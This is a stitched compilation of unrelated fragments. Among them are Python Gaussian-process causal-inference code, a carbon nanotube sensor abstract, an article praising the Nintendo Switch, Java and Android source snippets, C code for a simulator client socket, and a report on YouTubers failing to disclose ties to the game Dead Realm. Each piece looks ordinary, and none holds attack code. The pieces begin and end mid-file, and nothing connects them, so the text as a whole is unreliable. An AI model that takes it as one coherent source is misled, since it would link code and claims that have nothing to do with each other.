#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ elif(self.mod == self.mod_list[2]): Dataset0 = Dataset[Dataset['W']==0].copy() Dataset1 = Dataset[Dataset['W']==1].copy() # Extract data for the first learning task (control population) # ````````````````````````````````````````````````````````````````` X0 = np.reshape(Dataset0[Feature_names].copy(),(len(Dataset0),self.dim)) y0 = np.reshape(np.array(Dataset0['Y'].copy()),(len(Dataset0),1)) # Extract data for the second learning task (treated population) # ````````````````````````````````````````````````````````````````` X1 = np.reshape(Dataset1[Feature_names].copy(),(len(Dataset1),self.dim)) y1 = np.reshape(np.array(Dataset1['Y'].copy()),(len(Dataset1),1)) # Create an instance of a GPy Coregionalization model # ````````````````````````````````````````````````````````````````` K0 = GPy.kern.Matern32(self.dim, ARD=True) #GPy.kern.RBF(self.dim, ARD=True) K1 = GPy.kern.Matern32(self.dim)#, ARD=True) #GPy.kern.RBF(self.dim, ARD=True) K0 = GPy.kern.RBF(self.dim, ARD=True) K1 = GPy.kern.RBF(self.dim, ARD=True) #K0 = GPy.kern.MLP(self.dim, ARD=True) #K1 = GPy.kern.MLP(self.dim, ARD=True) #K0 = GPy.kern.Spline(input_dim=self.dim) #K1 = GPy.kern.Spline(input_dim=self.dim) kernel_dict = {"CMGP": GPy.util.multioutput.LCM(input_dim=self.dim,num_outputs=2,kernels_list=[K0, K1]), "NSGP": GPy.util.multioutput.ICM(input_dim=self.dim,num_outputs=2,kernel=K0)} #self.model = risk_based_empirical_bayes_GP(X_list = [X0,X1], Y_list = [y0,y1], W=W, # kernel = kernel_dict[self.mode]) self.model = GPy.models.GPCoregionalizedRegression(X_list = [X0, X1], Y_list = [y0, y1], kernel = kernel_dict[self.mode]) #self.initialize_hyperparameters(X, Y, W) try: self.model.optimize('bfgs', max_iters=500) except np.linalg.LinAlgError as err: print("Covariance matrix not invertible.") #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #----------------------------------------------------------------------------------------------------------- # This method Infers the treatment effect for a certain set of input covariates #------------------------------------------------------------------------------------------------------------ # ** Note ** all inputs to this method are positional arguments # This method returns the predicted ITE and posterior variance # but does not store them in self #--------------------------------------------------------------- def predict(self, X): """ Infers the treatment effect for a certain set of input covariates. Returns the predicted ITE and posterior variance. :X: The input covariates at which the outcomes need to be predicted """ # ```````````````````*\ Get input size /*`````````````````````````` # ---------------------------------------------------------------- Xshape = np.array(X).shape # ````````````````````````````````````````````````````````````````` if (self.mod == self.mod_list[0]): Y_est_0, var_0 = self.model[0].predict(X) Y_est_1, var_1 = self.model[1].predict(X) TE_est = Y_est_1 - Y_est_0 var_all = var_0 + var_1 # ---------------------------------------------------------------- elif (self.mod == self.mod_list[1]): W0 = np.reshape([0]*Xshape[0],(Xshape[0],1)) W1 = np.reshape([1]*Xshape[0],(Xshape[0],1)) X_new_0 = np.hstack((np.reshape(np.array(X),(Xshape[0],self.dim)),W0)) X_new_1 = np.hstack((np.reshape(np.array(X),(Xshape[0],self.dim)),W1)) Y_est_0, var_0 = self.model.predict(X_new_0) Y_est_1, var_1 = self.model.predict(X_new_1) TE_est = Y_est_1 - Y_est_0 var_all = var_0 + var_1 # correct this # ---------------------------------------------------------------- elif (self.mod == self.mod_list[2]): if self.dim == 1: X_ = X[:,None] X_0 = np.hstack([X_, np.reshape(np.array([0]*len(X)),(len(X),1))]) X_1 = np.hstack([X_, np.reshape(np.array([1]*len(X)),(len(X),1))]) noise_dict_0 = {'output_index': X_0[:,1:].astype(int)} noise_dict_1 = {'output_index': X_1[:,1:].astype(int)} Y_est_0 = self.model.predict(X_0, Y_metadata = noise_dict_0)[0] Y_est_1 = self.model.predict(X_1, Y_metadata = noise_dict_1)[0] else: X_0 = np.array(np.hstack([X, np.zeros_like(X[:,1].reshape((len(X[:,1]),1)))])) X_1 = np.array(np.hstack([X, np.ones_like(X[:,1].reshape((len(X[:,1]),1)))])) X_0_shape = X_0.shape X_1_shape = X_1.shape noise_dict_0 = {'output_index': X_0[:,X_0_shape[1]-1].reshape((X_0_shape[0],1)).astype(int)} noise_dict_1 = {'output_index': X_1[:,X_1_shape[1]-1].reshape((X_1_shape[0],1)).astype(int)} Y_est_0 = np.array(list(self.model.predict(X_0, Y_metadata = noise_dict_0)[0])) Y_est_1 = np.array(list(self.model.predict(X_1, Y_metadata = noise_dict_1)[0])) _,var_0 = self.model.predict(X_0, Y_metadata = noise_dict_0) _,var_1 = self.model.predict(X_1, Y_metadata = noise_dict_1) TE_est = Y_est_1 - Y_est_0 var_all = var_0 + var_1 return TE_est, Y_est_0, Y_est_1, var_all #----------------------------------------------------------------------------------------------------------- #----------------------------------------------------------------------------------------------------------- # This method initializes the model's hyper-parameters before passing to the optimizer # Now working only for the multi-task model #------------------------------------------------------------------------------------------------------------ def initialize_hyperparameters(self, X, Y, W): """ Initializes the multi-tasking model's hyper-parameters before passing to the optimizer :X: The input covariates :Y: The corresponding outcomes :W: The treatment assignments """ # ----------------------------------------------------------------------------------- # Output Parameters: # ----------------- # :Ls0, Ls1: length scale vectors for treated and control, dimensions match self.dim # :s0, s1: noise variances for the two kernels # :a0, a1: diagonal elements of correlation matrix 0 # :b0, b1: off-diagonal elements of correlation matrix 1 # ----------------------------------------------------------------------------------- Dataset = pd.DataFrame(X) Dataset['Y'] = Y Dataset['W'] = W Xshape = np.array(X).shape Yshape = np.array(Y).shape if (self.dim > 1): Feature_names = list(range(self.dim)) else: Feature_names = 0 if (self.mod == self.mod_list[2]): Dataset0 = Dataset[Dataset['W']==0] Dataset1 = Dataset[Dataset['W']==1] neigh0 = KNeighborsRegressor(n_neighbors=10) neigh1 = KNeighborsRegressor(n_neighbors=10) neigh0.fit(Dataset0[Feature_names], Dataset0['Y']) neigh1.fit(Dataset1[Feature_names], Dataset1['Y']) Dataset['Yk0'] = neigh0.predict(Dataset[Feature_names]) Dataset['Yk1'] = neigh1.predict(Dataset[Feature_names]) Dataset0['Yk0'] = Dataset.loc[Dataset['W']==0,'Yk0'] Dataset0['Yk1'] = Dataset.loc[Dataset['W']==0,'Yk1'] Dataset1['Yk0'] = Dataset.loc[Dataset['W']==1,'Yk0'] Dataset1['Yk1'] = Dataset.loc[Dataset['W']==1,'Yk1'] #````````````````````````````````````````````````````` a0 = np.sqrt(np.mean((Dataset0['Y']-np.mean(Dataset0['Y']))**2)) a1 = np.sqrt(np.mean((Dataset1['Y']-np.mean(Dataset1['Y']))**2)) b0 = np.mean((Dataset['Yk0']-np.mean(Dataset['Yk0']))*(Dataset['Yk1']-np.mean(Dataset['Yk1'])))/(a0*a1) b1 = b0 s0 = np.sqrt(np.mean((Dataset0['Y']-Dataset0['Yk0'])**2))/a0 s1 = np.sqrt(np.mean((Dataset1['Y']-Dataset1['Yk1'])**2))/a1 #````````````````````````````````````````````````````` self.model.sum.ICM0.rbf.lengthscale = 10*np.ones(self.dim) self.model.sum.ICM1.rbf.lengthscale = 10*np.ones(self.dim) self.model.sum.ICM0.rbf.variance = 1 self.model.sum.ICM1.rbf.variance = 1 self.model.sum.ICM0.B.W[0] = b0 self.model.sum.ICM0.B.W[1] = b0 self.model.sum.ICM1.B.W[0] = b1 self.model.sum.ICM1.B.W[1] = b1 self.model.sum.ICM0.B.kappa[0] = a0**2 self.model.sum.ICM0.B.kappa[1] = 1e-4 self.model.sum.ICM1.B.kappa[0] = 1e-4 self.model.sum.ICM1.B.kappa[1] = a1**2 self.model.mixed_noise.Gaussian_noise_0.variance = s0**2 self.model.mixed_noise.Gaussian_noise_1.variance = s1**2
Molecular modeling of the conductivity of carbon nanotubes under different temperature and humidity At present, the sensor is widely used and its types are varied, such as biological sensor, gas sensor, humidity sensor, optical sensor, pressure sensor, etc. However, the performance of many sensors remains to be optimized. For instance, the problems of activity of the biofilm, detection range and sensitivity life in biosensor have limited the development of its own. On the other hand, in gas sensor, the detection of hysteresis, degradation of serious phenomenon is widespread. And in the humidity sensor, humidity is the parameter which is hard to detect accurately, for serious impact of atmospheric pressure and temperature. However, with the emergence of CNTs based sensors, the above problems are hopefully solved. Owing to the excellent properties with CNTs, such as promoting electron transfer, large edge plane/basal plane ratio, high electrical conductivity, etc, CNTs based sensors have a higher sensitivity, lower detection limit and faster electron transfer kinetics than traditional ones. In addition, CNTs film has a very large specific surface area, and a strong interaction between the surrounding medium, therefore, CNTs film is seriously sensitive to the humidity of external environment, which has obvious humidity sensitive features. Due to the different using environment of CNTs sensors, the research of conductibility of CNTs under the different temperature has a great significance. Therefore, molecular modeling approach was adopted to analyze the conductivity of different type of CNTs like (9, 9) and (9, 0) CNTs within the scope of sensor operating temperature (-20°C-100°C) and different humidity conditions. It was found that the forbidden gap of (9, 9) and (9, 0) CNTs are basically decreased with the increase of temperature. Meanwhile the conductivity of CNTs under different moisture circumstances was also analyzed. The forbidden gap of CNTs has changed little after filled with pure water molecules This study provides a rational way using molecular modeling to evaluate and design CNTs for various applications such as biosensors and chemical sensors.
"Ultra Street Fighter II" for the Nintendo Switch Capcom It turns out that "Ultra Street Fighter II," a souped-up version of the 1991 classic for the new Nintendo Switch console, is a certifiable smash hit. So far, game developer Capcom says "Ultra Street Fighter II" has sold 450,000 copies, reports IGN— despite lukewarm reviews, and the ongoing shortage of the Switch console itself. Now, Capcom says it's planning to release a flurry of new Switch games to meet this apparent demand. From my perspective as a Nintendo Switch owner, the reason for the runaway success of this game is simple: Every video game ever made is better, or would be better, on the Nintendo Switch. All of them. Full stop. Let me explain. What Nintendo does for me I own a PlayStation 4 and an Xbox One, and a whole heap of games to play on them. Still, I don't get a lot of time to play games on the TV, and when I do, it's usually for a matter of minutes, not hours. Lately, I've played many more games on my iPhone or Nintendo 3DS than my fancy-pants TV consoles. It means that critically acclaimed games like "The Witcher 3" and even the older "Skyrim" have all passed me by. They're probably both great, but I just haven't been able to commit the 40-plus hours in front of my TV that those games would demand from me for full enjoyment. Back to Nintendo. In case you haven't heard, the Nintendo Switch has a simple, killer gimmick: It's a TV console, like an Xbox or PlayStation, but when you're on the go, you can pick it up right off its dock and keep on playing. It even lets you split one controller into two, for impromptu two-player action. The Nintendo Switch can be plugged into a TV, or played on-the-go. Either way, it's great. Ben Gilbert/Business Insider This has been a huge boon for me, personally. The Switch is a TV console, and a thing I can take with me. All of a sudden, I don't have to choose between playing a console game or something portable. Console games fit into my life, once again. And I suspect that I'm not alone in feeling this way. So, yeah, of course "Ultra Street Fighter II" sold like crazy, despite being a mediocre version of a decades-old classic. And when "Skyrim," which first released in 2011, comes out for the Switch later this year, it'll probably sell like crazy, too. The Switch itself makes any game more accessible, and more playable, by virtue of sheer flexibility. (Plus, this early in a console's life cycle, people are thirsty for any half-decent game, which also helps.) Ultimately, I would urge every game developer out there to consider a Nintendo Switch version of any games they're working on, or even that they've already made. Superhero fighting game "Injustice 2," for example, would be killer on the Switch. And, look, I get that the Nintendo Switch isn't as powerful under the hood as the Xbox One or PlayStation 4, graphically. Speaking personally, though, I would rather play a version of a great game at a lower resolution, or with slightly diminished special effects, than I would not play it at all.
/** * Determines the data member path to the specified node. * * @param node The node * @return The path, not containing the name of the top level complex type item node (e. g. "Buyer.Name") * or null if the node is the root node itself */ protected String determineNodePath(ItemTreeNode node) { ItemTreeNode rootNode = (ItemTreeNode) ((DefaultTreeModel) getModel()).getRoot(); StringBuffer sb = new StringBuffer(); while (node != rootNode) { if (node instanceof ModelObjectNode) { ModelObject object = ((ModelObjectNode) node).getModelObject(); String name = object.getName(); if (sb.length() == 0) { sb.append(name); } else { sb.insert(0, ModelQualifier.OBJECT_DELIMITER); sb.insert(0, name); } } node = (ItemTreeNode) node.getParent(); } if (sb.length() == 0) return null; return sb.toString(); }
// Convert WALL4 to WALL3, or WALL1 to WALL0, etc. Leave non-walls alone. constexpr CellState remove_wall_dep(CellState cell) { if (is_wall_with_deps(cell)) { return CellState(+cell >> 1); } return cell; }
/* * Connect a client to the server. * This performs the following PLI client-side initialization. * * 1) Initialize a lock for PLI setreg/getreg accesses * 2) Input connection host/port information from user. * 3) Setup DMA controller task to listen (locally) on dmaPort. * 4) Setup Interrupt Controller task to listen (locally) on intPort. * 5) Register an interrupt callback routine (passed in). * 6) Setup a local socket file descriptor to communicate with * pliHost on the given pliPort. * 7) Register the client with the server on pliHost. * The server may immediately start sending DMA and INTR requests. * Return: * 0 on success, a negative value on error. */ int pli_client_attach(int devNo) { struct addrinfo *res = NULL, *rp; struct addrinfo hints; verinet_t *v = &verinet[devNo]; ipaddr_t cli_addr; socklen_t cli_addrlen; rpc_cmd_t cmd; char tmp[80], *s; int rv = -1; memset(v, 0, sizeof (*v)); v->devNo = devNo; v->sockfd = -1; v->skipTestInt = 1; v->pli_mutex = sal_mutex_create("PLI socket mutex"); s = getenv("SOC_TARGET_SERVER"); if (!s) { snprintf(tmp, sizeof(tmp), "SOC_TARGET_SERVER%d", devNo); s = getenv(tmp); } if(!s) { snprintf(tmp, sizeof(tmp), "Enter unit %d PLI server host" "name [localhost]" ": ", devNo); sal_readline(tmp, v->pliHost, sizeof (v->pliHost), 0); if (sal_strlen(v->pliHost) == 0) { sal_strncpy(v->pliHost, "localhost", sizeof(v->pliHost) - 1); } } else { if(strlen(s) >= sizeof(v->pliHost)) strncpy(v->pliHost, s, sizeof(v->pliHost) - 1); else strncpy(v->pliHost, s, strlen(s)); } s = getenv("SOC_TARGET_PORT"); if (!s) { snprintf(tmp, sizeof(tmp), "SOC_TARGET_PORT%d", devNo); s = getenv(tmp); } if(!s){ snprintf(tmp, sizeof(tmp), "Enter unit %d remote port: ", devNo); sal_readline(tmp, tmp, sizeof (tmp), "2400"); v->pliPort = atoi(tmp); s = tmp; } else v->pliPort = atoi(s); memset(&hints, 0, sizeof(hints)); hints.ai_socktype = SOCK_STREAM; hints.ai_family = AF_UNSPEC; if (getaddrinfo(v->pliHost, s, &hints, &res) != 0) { cli_out("pli_client_attach: hostname lookup failed " "for host [%s] (%s)\n", v->pliHost, strerror(errno)); goto error; } for (rp = res; rp != NULL; rp = rp->ai_next) { v->sockfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol); if (v->sockfd < 0) { continue; } #ifdef VERINET_CUSTOM_SOCKET_HOOK VERINET_CUSTOM_SOCKET_HOOK #endif if (connect(v->sockfd, rp->ai_addr, rp->ai_addrlen) == 0) { break; } close(v->sockfd); v->sockfd = -1; } if (rp == NULL) { cli_out("client_attach: could not connect unit %d to [%s.%d] (%s)\n", devNo, v->pliHost, v->pliPort, strerror(errno)); goto error; } cli_addrlen = sizeof(cli_addr); if (getsockname(v->sockfd, &cli_addr.sa, &cli_addrlen) < 0) { cli_out("client_attach: getsockname failed (%s)\n", strerror(errno)); goto error; } if (!v->jobsStarted) { if (dmac_init(v) < 0) { goto error; } if (intr_init(v) < 0) { goto error; } v->jobsStarted = 1; } if (cli_addr.sin6.sin6_family == AF_INET6) { make_rpc_register_ip6_req(&cmd, v->intPort, v->dmaPort, (uint32_t *)&cli_addr.sin6.sin6_addr); } else { make_rpc_register_req(&cmd, v->intPort, v->dmaPort, (uint32_t)cli_addr.sin.sin_addr.s_addr); } if (write_command(v->sockfd, &cmd) != RPC_OK) { cli_out("pli_client_attach: could not send REGISTER request\n"); goto error; } if (wait_command(v->sockfd, &cmd) < 0) goto error; if (cmd.opcode != RPC_REGISTER_CLIENT || cmd.status != RPC_OK) { cli_out("pli_client_attach: PLI registration failed\n"); goto error; } freeaddrinfo(res); return 0; error: if (res) { freeaddrinfo(res); } if (v->sockfd >= 0) { close(v->sockfd); v->sockfd = -1; } return rv; }
/** * Model definition for Precinct. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the Google Civic Information API. For a detailed * explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class Precinct extends com.google.api.client.json.GenericJson { /** * ID of the AdministrationRegion message for this precinct. Corresponds to LocalityId xml tag. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String administrationRegionId; /** * ID(s) of the Contest message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> contestId; /** * Required. Dataset ID. What datasets our Precincts come from. * The value may be {@code null}. */ @com.google.api.client.util.Key @com.google.api.client.json.JsonString private java.lang.Long datasetId; /** * ID(s) of the PollingLocation message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> earlyVoteSiteId; /** * ID(s) of the ElectoralDistrict message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> electoralDistrictId; /** * Required. A unique identifier for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String id; /** * Specifies if the precinct runs mail-only elections. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean mailOnly; /** * Required. The name of the precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * The number of the precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String number; /** * Encouraged. The OCD ID of the precinct * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> ocdId; /** * ID(s) of the PollingLocation message(s) for this precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> pollingLocationId; /** * ID(s) of the SpatialBoundary message(s) for this precinct. Used to specify a geometrical * boundary of the precinct. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> spatialBoundaryId; /** * If present, this proto corresponds to one portion of split precinct. Other portions of this * precinct are guaranteed to have the same `name`. If not present, this proto represents a full * precicnt. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String splitName; /** * Specifies the ward the precinct is contained within. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String ward; /** * ID of the AdministrationRegion message for this precinct. Corresponds to LocalityId xml tag. * @return value or {@code null} for none */ public java.lang.String getAdministrationRegionId() { return administrationRegionId; } /** * ID of the AdministrationRegion message for this precinct. Corresponds to LocalityId xml tag. * @param administrationRegionId administrationRegionId or {@code null} for none */ public Precinct setAdministrationRegionId(java.lang.String administrationRegionId) { this.administrationRegionId = administrationRegionId; return this; } /** * ID(s) of the Contest message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getContestId() { return contestId; } /** * ID(s) of the Contest message(s) for this precinct. * @param contestId contestId or {@code null} for none */ public Precinct setContestId(java.util.List<java.lang.String> contestId) { this.contestId = contestId; return this; } /** * Required. Dataset ID. What datasets our Precincts come from. * @return value or {@code null} for none */ public java.lang.Long getDatasetId() { return datasetId; } /** * Required. Dataset ID. What datasets our Precincts come from. * @param datasetId datasetId or {@code null} for none */ public Precinct setDatasetId(java.lang.Long datasetId) { this.datasetId = datasetId; return this; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getEarlyVoteSiteId() { return earlyVoteSiteId; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @param earlyVoteSiteId earlyVoteSiteId or {@code null} for none */ public Precinct setEarlyVoteSiteId(java.util.List<java.lang.String> earlyVoteSiteId) { this.earlyVoteSiteId = earlyVoteSiteId; return this; } /** * ID(s) of the ElectoralDistrict message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getElectoralDistrictId() { return electoralDistrictId; } /** * ID(s) of the ElectoralDistrict message(s) for this precinct. * @param electoralDistrictId electoralDistrictId or {@code null} for none */ public Precinct setElectoralDistrictId(java.util.List<java.lang.String> electoralDistrictId) { this.electoralDistrictId = electoralDistrictId; return this; } /** * Required. A unique identifier for this precinct. * @return value or {@code null} for none */ public java.lang.String getId() { return id; } /** * Required. A unique identifier for this precinct. * @param id id or {@code null} for none */ public Precinct setId(java.lang.String id) { this.id = id; return this; } /** * Specifies if the precinct runs mail-only elections. * @return value or {@code null} for none */ public java.lang.Boolean getMailOnly() { return mailOnly; } /** * Specifies if the precinct runs mail-only elections. * @param mailOnly mailOnly or {@code null} for none */ public Precinct setMailOnly(java.lang.Boolean mailOnly) { this.mailOnly = mailOnly; return this; } /** * Required. The name of the precinct. * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * Required. The name of the precinct. * @param name name or {@code null} for none */ public Precinct setName(java.lang.String name) { this.name = name; return this; } /** * The number of the precinct. * @return value or {@code null} for none */ public java.lang.String getNumber() { return number; } /** * The number of the precinct. * @param number number or {@code null} for none */ public Precinct setNumber(java.lang.String number) { this.number = number; return this; } /** * Encouraged. The OCD ID of the precinct * @return value or {@code null} for none */ public java.util.List<java.lang.String> getOcdId() { return ocdId; } /** * Encouraged. The OCD ID of the precinct * @param ocdId ocdId or {@code null} for none */ public Precinct setOcdId(java.util.List<java.lang.String> ocdId) { this.ocdId = ocdId; return this; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getPollingLocationId() { return pollingLocationId; } /** * ID(s) of the PollingLocation message(s) for this precinct. * @param pollingLocationId pollingLocationId or {@code null} for none */ public Precinct setPollingLocationId(java.util.List<java.lang.String> pollingLocationId) { this.pollingLocationId = pollingLocationId; return this; } /** * ID(s) of the SpatialBoundary message(s) for this precinct. Used to specify a geometrical * boundary of the precinct. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getSpatialBoundaryId() { return spatialBoundaryId; } /** * ID(s) of the SpatialBoundary message(s) for this precinct. Used to specify a geometrical * boundary of the precinct. * @param spatialBoundaryId spatialBoundaryId or {@code null} for none */ public Precinct setSpatialBoundaryId(java.util.List<java.lang.String> spatialBoundaryId) { this.spatialBoundaryId = spatialBoundaryId; return this; } /** * If present, this proto corresponds to one portion of split precinct. Other portions of this * precinct are guaranteed to have the same `name`. If not present, this proto represents a full * precicnt. * @return value or {@code null} for none */ public java.lang.String getSplitName() { return splitName; } /** * If present, this proto corresponds to one portion of split precinct. Other portions of this * precinct are guaranteed to have the same `name`. If not present, this proto represents a full * precicnt. * @param splitName splitName or {@code null} for none */ public Precinct setSplitName(java.lang.String splitName) { this.splitName = splitName; return this; } /** * Specifies the ward the precinct is contained within. * @return value or {@code null} for none */ public java.lang.String getWard() { return ward; } /** * Specifies the ward the precinct is contained within. * @param ward ward or {@code null} for none */ public Precinct setWard(java.lang.String ward) { this.ward = ward; return this; } @Override public Precinct set(String fieldName, Object value) { return (Precinct) super.set(fieldName, value); } @Override public Precinct clone() { return (Precinct) super.clone(); } }
A few weeks ago a multiplayer horror game, Section Studios' Dead Realm, was released on Steam's Early Access service and quickly rose to (briefly) become one of its top sellers. (According to SteamSpy, it's sold 70,000 units at $15, and it's undoubtedly a satisfying game, given almost 1,500 reviews averaging 'Very Positive'). In particular, the game has proven popular among YouTubers, in part because it's explicitly designed to be played in front of an audience. "We developed this game to not only be fun to play, but also fun to watch," reads an excerpt of the game's description on Steam. The rise of YouTubers has definitely affected how many developers make games, but Dead Realm is a special case: it's published by 3BlackDot, the "influencer-driven" entertainment startup founded last year by ex-Machinima staffers in conjunction with YouTubers Tom "Syndicate" Cassell and Adam "SeaNanners" Montoya. This is important because both Syndicate and SeaNanners have published multiple videos of themselves excitedly playing Dead Realm without clearly disclosing their financial ties to the game's publisher, seemingly defying the FTC's strict guidelines for how YouTubers should disclose paid endorsements (coincidentally, the UK Committee of Advertising Practices published a similar set of revised guidelines this week in an effort to enforce transparency among YouTubers producing advertorial videos.) Gamasutra has contacted multiple 3BlackDot representatives to verify whether or not the company is aware of the FTC's expectations and ascertain whether it has any plans to comply, but received no direct response to that question. "If an ad features an endorser who’s a relative or employee of the marketer, the ad is misleading unless the connection is made clear," reads the FTC's endorsement guide. "The reason is obvious: Knowing about the connection is important information for anyone evaluating the endorsement." It may well be an honest oversight. The FTC's revised disclosure guidelines for YouTubers are relatively new, as is the fact that Let's Play videos can serve as effective ads for games, and both Cassell and Montoya have previously published videos (albeit weeks or months ago) in which they speak briefly about being involved in the development of Dead Realm. Moreover, in direct communications about Dead Realm 3BlackDot proudly touts the YouTubers' involvement. Gamasutra received an email from a company representative this week that read, in part, "Evan Fong (VanossGaming – 13.7 million subscribers), Tom Cassell (TheSyndicateProject – 9.1 million subscribers) and Adam Montoya (SeaNanners – 5.4 million subscribers), all partners and co-creators at 3BD, joined forces to create the first multiplayer PC game that was created by an influencer network specifically for the YouTube community." (It then goes on to tout the number of unique views YouTube videos made about the game have garnered since its release, "all with zero marketing spend.") While each of the aforementioned YouTubers has published multiple Dead Realm Let's Play videos, only Fong appears to have made any attempt at disclosing his ties to the game in post-release videos -- and only implicitly, in a text description on his first Dead Realm video that reads (in part) "We will also be releasing new ghost characters, human characters, and maps as time goes on...Thanks for all your support." Even that probably doesn't cut it, from a federal standpoint. When Gamasutra spoke to FTC representative Mary Engle last year amid concerns that some popular YouTubers were accepting money to play or review games in their videos without disclosure, she made it clear that the commission expects "... disclosure should be clear and conspicuous, and should be upfront and easy to see where the viewer won't miss it." Failure to do so is grounds for an FTC investigation, which could lead to a lawsuit; the FTC recently compelled Sony to pay refunds over misleading Vita ads and barred employees of its marketing firm partner, Deutsch LA, from misleading consumers with product endorsements on social networks without clearly disclosing their financial ties to the product. This isn't the first time that 3BlackDot YouTubers have failed to clearly disclose financial ties to the products they play, either. When Gamasutra spoke to company co-founders Luke Stepleton and Angelo Pullen last year, Stepleton said that transparency was "not an issue" and that company representatives would clearly disclose all paid videos. "Adam and Tom have done a brand integration for Disney Infinity. It's very clear when you watch the video, they're saying, 'Hey guys, Disney asked me to do this video,'" Stepleton said. "It's clear they're working with the brand to market or promote." Gamasutra then promptly watched those videos and never heard either YouTuber say 'Hey guys, Disney asked me to do this video,' nor give any clear indication they'd been paid to produce the "brand integration" videos -- only that they'd been invited to play the game early. 3BlackDot's established disregard for being transparent about its YouTubers' business arrangements is doubly troubling because complying with FTC expectations (by, say, adding a line of text or a graphic that clearly states "I had a hand in making this game" to these videos) probably won't make these videos any less appealing, but failing to do so potentially damages the credibility of YouTubers as a whole.
/** * This test and DummyBaseCloneTest make sure that two TestBase classes can be executed in the same suite - * in particular, it makes sure that Explore is working properly. */ public class DummyBaseTestRun extends TestFrameworkTestBase { @Test public void test() throws Exception { deployApplication(DummyApp.class); Connection connection = getQueryClient(); try { Set<String> tables = Sets.newHashSet(); ResultSet resultSet = connection.prepareStatement("show tables").executeQuery(); try { while (resultSet.next()) { tables.add(resultSet.getString(1)); } } finally { resultSet.close(); } // Since this test can runs in test suite that may contains other tests, // use intersect to verify to avoid seeing tables created by other tests Set<String> expected = Sets.newHashSet("dataset_whom"); Assert.assertEquals(expected, Sets.intersection(expected, tables)); } finally { connection.close(); } } }
/** * Properties of entity Aqi.<br/> * Can be used for QueryBuilder and for referencing column names. */ public static class Properties { public final static Property Areaid = new Property(0, String.class, "areaid", false, "AREAID"); public final static Property Aqi = new Property(1, Integer.class, "aqi", false, "AQI"); public final static Property Quality = new Property(2, String.class, "quality", false, "QUALITY"); public final static Property Pm2_5 = new Property(3, Integer.class, "pm2_5", false, "PM2_5"); public final static Property Pm10 = new Property(4, Integer.class, "pm10", false, "PM10"); public final static Property So2 = new Property(5, Integer.class, "so2", false, "SO2"); public final static Property No2 = new Property(6, Integer.class, "no2", false, "NO2"); }
def canceled_sessions_chart(self): context = {} where_clause = '''WHERE ((session.state_id is null AND session.canceled=True) OR (session.state_id is not null AND session.last_modified < (NOW() - INTERVAL '24 hour')))''' with connection.cursor() as cursor: web_where_clause = where_clause + " AND connection.identity LIKE 'web-%'" query = self.query_for_session_data.format(state_type='state_at_close_id', where_clause=web_where_clause) web_canceled_sessions_chart, web_canceled_sessions_map = prepare_data(cursor, query) context['web_canceled_sessions_chart'] = web_canceled_sessions_chart context['web_canceled_sessions_map'] = web_canceled_sessions_map sms_where_clause = where_clause + " AND connection.identity NOT LIKE 'web-%'" query = self.query_for_session_data.format(state_type='state_at_close_id', where_clause=sms_where_clause) sms_canceled_sessions_chart, sms_canceled_sessions_map = prepare_data(cursor, query) context['sms_canceled_sessions_chart'] = sms_canceled_sessions_chart context['sms_canceled_sessions_map'] = sms_canceled_sessions_map return context
def XMLToPython (pattern): assert isinstance(pattern, six.text_type) py_pattern, position = _MatchSubRegex(pattern, 0) if position != len(pattern): raise RegularExpressionError() return six.u("^%s$") % (py_pattern,)
/** * Call after invoking {@link WindowContainer#prepareSurfaces} on children as * described in {@link #resetDimStates}. * * @param t A transaction in which to update the dims. * @param bounds The bounds at which to dim. * @return true if any Dims were updated. */ boolean updateDims(SurfaceControl.Transaction t, Rect bounds) { if (mDimState == null) { return false; } if (!mDimState.mDimming) { if (!mDimState.mAnimateExit) { if (mDimState.mDimLayer.isValid()) { t.remove(mDimState.mDimLayer); } } else { startDimExit(mLastRequestedDimContainer, mDimState.mSurfaceAnimator, t); } mDimState = null; return false; } else { t.setPosition(mDimState.mDimLayer, bounds.left, bounds.top); t.setWindowCrop(mDimState.mDimLayer, bounds.width(), bounds.height()); if (!mDimState.isVisible) { mDimState.isVisible = true; t.show(mDimState.mDimLayer); startDimEnter(mLastRequestedDimContainer, mDimState.mSurfaceAnimator, t); } return true; } }
